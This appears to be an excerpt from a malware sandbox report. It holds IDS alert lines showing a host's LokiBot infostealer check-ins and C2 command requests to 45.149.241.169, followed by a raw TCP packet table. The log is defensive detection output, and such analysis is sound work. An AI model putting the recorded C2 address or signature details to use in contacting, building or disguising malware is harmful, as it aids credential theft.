2024-10-03T09:22:19.163958+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49785	45.149.241.169	80	TCP
2024-10-03T09:22:19.168785+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49785	TCP
2024-10-03T09:22:19.323391+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49786	45.149.241.169	80	TCP
2024-10-03T09:22:19.323391+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49786	45.149.241.169	80	TCP
2024-10-03T09:22:19.323391+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49786	45.149.241.169	80	TCP
2024-10-03T09:22:19.984520+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49786	45.149.241.169	80	TCP
2024-10-03T09:22:19.984520+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49786	45.149.241.169	80	TCP
2024-10-03T09:22:19.989579+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49786	TCP
2024-10-03T09:22:20.145363+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49787	45.149.241.169	80	TCP
2024-10-03T09:22:20.145363+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49787	45.149.241.169	80	TCP
2024-10-03T09:22:20.145363+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49787	45.149.241.169	80	TCP
2024-10-03T09:22:20.837934+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49787	45.149.241.169	80	TCP
2024-10-03T09:22:20.837934+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49787	45.149.241.169	80	TCP
2024-10-03T09:22:20.842773+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49787	TCP
2024-10-03T09:22:20.992218+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49788	45.149.241.169	80	TCP
2024-10-03T09:22:20.992218+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49788	45.149.241.169	80	TCP
2024-10-03T09:22:20.992218+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49788	45.149.241.169	80	TCP
2024-10-03T09:22:21.745606+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49788	45.149.241.169	80	TCP
2024-10-03T09:22:21.745606+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49788	45.149.241.169	80	TCP
2024-10-03T09:22:21.750540+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49788	TCP
2024-10-03T09:22:21.900606+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49789	45.149.241.169	80	TCP
2024-10-03T09:22:21.900606+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49789	45.149.241.169	80	TCP
2024-10-03T09:22:21.900606+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49789	45.149.241.169	80	TCP
2024-10-03T09:22:22.564890+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49789	45.149.241.169	80	TCP
2024-10-03T09:22:22.564890+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49789	45.149.241.169	80	TCP
2024-10-03T09:22:22.569891+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49789	TCP
2024-10-03T09:22:22.731444+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49790	45.149.241.169	80	TCP
2024-10-03T09:22:22.731444+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49790	45.149.241.169	80	TCP
2024-10-03T09:22:22.731444+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49790	45.149.241.169	80	TCP
2024-10-03T09:22:23.426654+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49790	45.149.241.169	80	TCP
2024-10-03T09:22:23.426654+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49790	45.149.241.169	80	TCP
2024-10-03T09:22:23.432070+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49790	TCP
2024-10-03T09:22:23.590474+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49791	45.149.241.169	80	TCP
2024-10-03T09:22:23.590474+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49791	45.149.241.169	80	TCP
2024-10-03T09:22:23.590474+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49791	45.149.241.169	80	TCP
2024-10-03T09:22:24.372920+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49791	45.149.241.169	80	TCP
2024-10-03T09:22:24.372920+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49791	45.149.241.169	80	TCP
2024-10-03T09:22:24.378030+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49791	TCP
2024-10-03T09:22:24.518060+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49792	45.149.241.169	80	TCP
2024-10-03T09:22:24.518060+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49792	45.149.241.169	80	TCP
2024-10-03T09:22:24.518060+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49792	45.149.241.169	80	TCP
2024-10-03T09:22:25.207193+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49792	45.149.241.169	80	TCP
2024-10-03T09:22:25.207193+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49792	45.149.241.169	80	TCP
2024-10-03T09:22:25.212158+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49792	TCP
2024-10-03T09:22:25.368288+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49793	45.149.241.169	80	TCP
2024-10-03T09:22:25.368288+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49793	45.149.241.169	80	TCP
2024-10-03T09:22:25.368288+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49793	45.149.241.169	80	TCP
2024-10-03T09:22:26.051444+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49793	45.149.241.169	80	TCP
2024-10-03T09:22:26.051444+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49793	45.149.241.169	80	TCP
2024-10-03T09:22:26.056641+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49793	TCP
2024-10-03T09:22:26.207258+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49794	45.149.241.169	80	TCP
2024-10-03T09:22:26.207258+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49794	45.149.241.169	80	TCP
2024-10-03T09:22:26.207258+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49794	45.149.241.169	80	TCP
2024-10-03T09:22:26.870939+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49794	45.149.241.169	80	TCP
2024-10-03T09:22:26.870939+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49794	45.149.241.169	80	TCP
2024-10-03T09:22:26.875901+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49794	TCP
2024-10-03T09:22:27.022466+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49795	45.149.241.169	80	TCP
2024-10-03T09:22:27.022466+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49795	45.149.241.169	80	TCP
2024-10-03T09:22:27.022466+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49795	45.149.241.169	80	TCP
2024-10-03T09:22:27.946191+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49795	45.149.241.169	80	TCP
2024-10-03T09:22:27.946191+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49795	45.149.241.169	80	TCP
2024-10-03T09:22:27.950982+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49795	TCP
2024-10-03T09:22:28.117331+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49796	45.149.241.169	80	TCP
2024-10-03T09:22:28.117331+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49796	45.149.241.169	80	TCP
2024-10-03T09:22:28.117331+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49796	45.149.241.169	80	TCP
2024-10-03T09:22:28.768533+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49796	45.149.241.169	80	TCP
2024-10-03T09:22:28.768533+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49796	45.149.241.169	80	TCP
2024-10-03T09:22:28.773427+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49796	TCP
2024-10-03T09:22:28.927858+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49797	45.149.241.169	80	TCP
2024-10-03T09:22:28.927858+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49797	45.149.241.169	80	TCP
2024-10-03T09:22:28.927858+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49797	45.149.241.169	80	TCP
2024-10-03T09:22:29.580351+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49797	45.149.241.169	80	TCP
2024-10-03T09:22:29.580351+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49797	45.149.241.169	80	TCP
2024-10-03T09:22:29.585337+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49797	TCP
2024-10-03T09:22:29.746973+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49798	45.149.241.169	80	TCP
2024-10-03T09:22:29.746973+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49798	45.149.241.169	80	TCP
2024-10-03T09:22:29.746973+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49798	45.149.241.169	80	TCP
2024-10-03T09:22:30.494085+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49798	45.149.241.169	80	TCP
2024-10-03T09:22:30.494085+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49798	45.149.241.169	80	TCP
2024-10-03T09:22:30.499155+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49798	TCP
2024-10-03T09:22:30.654397+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49799	45.149.241.169	80	TCP
2024-10-03T09:22:30.654397+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49799	45.149.241.169	80	TCP
2024-10-03T09:22:30.654397+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49799	45.149.241.169	80	TCP
2024-10-03T09:22:31.469550+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49799	45.149.241.169	80	TCP
2024-10-03T09:22:31.469550+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49799	45.149.241.169	80	TCP
2024-10-03T09:22:31.474479+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49799	TCP
2024-10-03T09:22:31.633256+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49800	45.149.241.169	80	TCP
2024-10-03T09:22:31.633256+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49800	45.149.241.169	80	TCP
2024-10-03T09:22:31.633256+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49800	45.149.241.169	80	TCP
2024-10-03T09:22:32.287998+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49800	45.149.241.169	80	TCP
2024-10-03T09:22:32.287998+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49800	45.149.241.169	80	TCP
2024-10-03T09:22:32.296880+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49800	TCP
2024-10-03T09:22:32.759509+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49801	45.149.241.169	80	TCP
2024-10-03T09:22:32.759509+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49801	45.149.241.169	80	TCP
2024-10-03T09:22:32.759509+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49801	45.149.241.169	80	TCP
2024-10-03T09:22:33.477823+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49801	45.149.241.169	80	TCP
2024-10-03T09:22:33.477823+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49801	45.149.241.169	80	TCP
2024-10-03T09:22:33.482941+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49801	TCP
2024-10-03T09:22:33.636826+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49802	45.149.241.169	80	TCP
2024-10-03T09:22:33.636826+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49802	45.149.241.169	80	TCP
2024-10-03T09:22:33.636826+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49802	45.149.241.169	80	TCP
2024-10-03T09:22:34.400049+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49802	45.149.241.169	80	TCP
2024-10-03T09:22:34.400049+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49802	45.149.241.169	80	TCP
2024-10-03T09:22:34.404990+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49802	TCP
2024-10-03T09:22:34.567446+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49803	45.149.241.169	80	TCP
2024-10-03T09:22:34.567446+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49803	45.149.241.169	80	TCP
2024-10-03T09:22:34.567446+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49803	45.149.241.169	80	TCP
2024-10-03T09:22:35.266278+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49803	45.149.241.169	80	TCP
2024-10-03T09:22:35.266278+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49803	45.149.241.169	80	TCP
2024-10-03T09:22:35.271094+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49803	TCP
2024-10-03T09:22:35.412082+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49804	45.149.241.169	80	TCP
2024-10-03T09:22:35.412082+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49804	45.149.241.169	80	TCP
2024-10-03T09:22:35.412082+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49804	45.149.241.169	80	TCP
2024-10-03T09:22:36.047866+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49804	45.149.241.169	80	TCP
2024-10-03T09:22:36.047866+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49804	45.149.241.169	80	TCP
2024-10-03T09:22:36.052804+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49804	TCP
2024-10-03T09:22:36.196016+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49805	45.149.241.169	80	TCP
2024-10-03T09:22:36.196016+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49805	45.149.241.169	80	TCP
2024-10-03T09:22:36.196016+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49805	45.149.241.169	80	TCP
2024-10-03T09:22:36.840524+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49805	45.149.241.169	80	TCP
2024-10-03T09:22:36.840524+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49805	45.149.241.169	80	TCP
2024-10-03T09:22:36.845617+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49805	TCP
2024-10-03T09:22:36.999089+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49806	45.149.241.169	80	TCP
2024-10-03T09:22:36.999089+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49806	45.149.241.169	80	TCP
2024-10-03T09:22:36.999089+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49806	45.149.241.169	80	TCP
2024-10-03T09:22:37.716251+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49806	45.149.241.169	80	TCP
2024-10-03T09:22:37.716251+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49806	45.149.241.169	80	TCP
2024-10-03T09:22:37.721157+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49806	TCP
2024-10-03T09:22:37.869567+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49807	45.149.241.169	80	TCP
2024-10-03T09:22:37.869567+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49807	45.149.241.169	80	TCP
2024-10-03T09:22:37.869567+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49807	45.149.241.169	80	TCP
2024-10-03T09:22:40.207040+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49807	45.149.241.169	80	TCP
2024-10-03T09:22:40.207040+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49807	45.149.241.169	80	TCP
2024-10-03T09:22:40.212403+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49807	TCP
2024-10-03T09:22:40.386731+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49808	45.149.241.169	80	TCP
2024-10-03T09:22:40.386731+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49808	45.149.241.169	80	TCP
2024-10-03T09:22:40.386731+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49808	45.149.241.169	80	TCP
2024-10-03T09:22:41.026370+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49808	45.149.241.169	80	TCP
2024-10-03T09:22:41.026370+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49808	45.149.241.169	80	TCP
2024-10-03T09:22:41.031299+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49808	TCP
2024-10-03T09:22:41.280593+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.10	49809	45.149.241.169	80	TCP
2024-10-03T09:22:41.280593+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.10	49809	45.149.241.169	80	TCP
2024-10-03T09:22:41.280593+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.10	49809	45.149.241.169	80	TCP
2024-10-03T09:22:41.948130+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.10	49809	45.149.241.169	80	TCP
2024-10-03T09:22:41.948130+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.10	49809	45.149.241.169	80	TCP
2024-10-03T09:22:41.953121+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.149.241.169	80	192.168.2.10	49809	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2024 09:20:40.854855061 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:40.854902029 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:40.854976892 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:40.866173029 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:40.866197109 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.340781927 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.340867996 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:41.344105005 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:41.344114065 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.344358921 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.355087042 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:41.399409056 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.651647091 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.651695013 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.651735067 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.651777983 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.651796103 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:41.651822090 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.651834965 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:41.651875973 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:41.651881933 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.652359962 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.652376890 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.652435064 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:41.652441978 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.652487040 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:41.758903980 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.758975029 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.759001017 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.759048939 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:41.759066105 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.759087086 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.759131908 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:41.759316921 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.759360075 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:41.759368896 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.759439945 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.759480000 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.759500980 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:41.759510040 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.759567022 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:41.760092020 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.805732012 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:41.805785894 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.852587938 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:41.881287098 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.881351948 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.881378889 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.881405115 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.881452084 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:41.881485939 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.881987095 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.882011890 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.882040977 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.882050991 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:41.882057905 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.882093906 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:41.882812023 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.882869005 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:41.882874966 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.883179903 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.883203983 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.883260012 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:41.883265972 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.883317947 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:41.883321047 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.930692911 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:41.994486094 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.994553089 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.994584084 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.994616985 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:41.994651079 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.994663000 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:41.995210886 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.995244980 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.995317936 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:41.995325089 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.996129990 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.996162891 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.996191978 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:41.996197939 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:41.996227026 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:41.996484041 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:42.054049015 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:42.054227114 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:42.055442095 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:42.055535078 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:42.055799961 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:42.055825949 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:42.055870056 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:42.056010008 CEST	443	49706	188.114.97.3	192.168.2.10
Oct 3, 2024 09:20:42.056063890 CEST	49706	443	192.168.2.10	188.114.97.3
Oct 3, 2024 09:20:42.058017969 CEST	443	49706	188.114.97.3	192.168.2.10
